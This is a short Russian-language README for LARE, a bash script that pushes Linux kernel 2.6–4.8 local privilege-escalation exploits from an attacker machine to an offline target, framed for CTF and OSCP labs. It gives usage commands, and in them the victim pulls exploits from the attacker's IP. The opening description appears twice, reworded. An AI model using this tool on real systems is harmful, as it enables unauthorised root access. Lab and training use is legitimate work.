
[L]ocal [A]uto [R]oot [E]xploiter — это простой bash-скрипт, который помогает развертывать локальные root-эксплойты с вашей атакующей машины, когда у машины жертвы нет подключения к интернету.
[L]окальный [A]втоматический [R]ут-[E]ксплоитер — это простой bash-скрипт, который помогает развернуть локальные эксплойты для получения root-прав с атакующей машины, когда на целевой машине нет доступа в интернет.
Скрипт полезен в сценарии, когда целевая машина не имеет интернет-соединения (например), когда вы переходите во внутренние сети или участвуете в CTF, которые используют VPN для подключения к своим закрытым лабораториям (например, hackthebox.gr или даже в лабораториях OSCP).
Скрипт использует локальные эксплойты для ядра Linux 2.6–4.8.
Этот скрипт вдохновлён Nilotpal Biswas's Auto Root Exploit Tool
bash LARE.sh -a или ./LARE.sh -a
После этого скопируйте скрипт на целевую машину любым способом (wget, ftp, curl и т.д.) и запустите эксплойтер локально с помощью следующей команды:
bash LARE.sh -l [IP-атакующего] или ./LARE.sh -l [IP-атакующего]
bash LARE.sh -l или ./LARE.sh -l
Скрипт запускает несколько эксплойтов для ядра на машине, что может привести к нестабильности системы. Настоятельно рекомендуется использовать его только в крайнем случае и в непродуктивной среде.